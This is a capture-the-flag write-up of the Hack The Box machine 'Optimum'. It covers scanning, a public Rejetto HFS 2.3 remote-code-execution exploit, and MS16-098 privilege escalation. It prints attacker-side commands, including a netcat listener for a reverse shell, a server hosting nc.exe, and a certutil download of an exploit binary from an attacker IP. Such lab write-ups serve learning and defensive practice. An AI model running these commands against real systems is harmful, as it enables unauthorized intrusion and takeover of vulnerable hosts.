tsustyle

Red Team Aspirant

Optimum

1 minute read

img

Port Scanning and General Enumeration (Nmap)

Initial scan showed that only port 80 (HTTP) is available

img

img

Clicking the link takes us to www.rejetto.com

What we know:

  • It’s running HttpFileServer 2.3
  • The vendor is rejetto

Access (searchsploit, Rejetto HFS RCE)

Let’s see if there’s anything on searchsploit for rejetto or http file server 2.3

searchsploit rejetto

img

Let’s grab Remote Command Execution (2)

searchsploit -m 39161.py

-m allows us to copy the exploit into our current working directory.

Let’s read a bit about what it does

https://www.exploit-db.com/exploits/39161

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!

So we need to be hosting nc.exe on port 80. That’s easy enough. On kali, windows binaries are stored at /usr/share/windows-binaries

img

Now we’re going to need a few tabs:

  • On one, our python server (python3 -m http.server 80) where nc.exe is located
  • On another, a listener waiting to catch our shell (nc -lvnp 4444)
  • And finally, one to fire the exploit

This is what mine looked like after the exploit completed:

img

img

Privesc (Windows Exploit Suggester, MS16-098)

I ran winPEAS on the machine but didn’t come back with much so I assume that maybe we’re looking at a kernel exploit. Let’s try Windows Exploit Suggester

Note: for Windows Exploit Suggester to work we need to install a specific version of xlrd:

pip2 install --user xlrd==1.1.0

There’s a couple things we need to do before we can run this.

  • First, run it with the --update switch. That will write an xls file for us to use.
  • Second, on the victim machine, use the command systeminfo and copy all of the output and save it to a file. I’ll name my systeminfo.txt
  • Now run it:

python windows-exploit-suggester.py -database 2021-01-25-mssb.xls -systeminfo systeminfo.txt

img

Let’s look at MS16-098. There’s a precompiled binary for us to grab on the github page. Let’s grab that and transfer it over to the victim machine.

certutil -urlcache -f Http://10.10.14.18:8000/ms16098.exe ms16098.exe

img

Give it a run!

img

img

You may also enjoy

Tenet

‘Tenet’ is a medium rated box on Hack the Box. We’ll be using PHP Object Injection to get RCE and identify a race condition in a custom script for privesc.

Skynet

‘Skynet’ is a box on TryHackMe. We’ll be enumerating SMB shares, brute forcing a login and exploiting a Remote File Inclusion vulnerability in Cuppa CMS for a foothold. For our root shell we’ll take a look at exploiting some wildcard injection using a script that’s being run as a cronjob.

FFuF Cheatsheet

This is a Cheatsheet I created for reference when using FFuF

Ready

‘Ready’ is a medium rated box on Hack the Box. We’ll be using a public exploit for a vulnerable Gitlab version for a shell, enumeration and password reuse for privesc and escape a docker container for root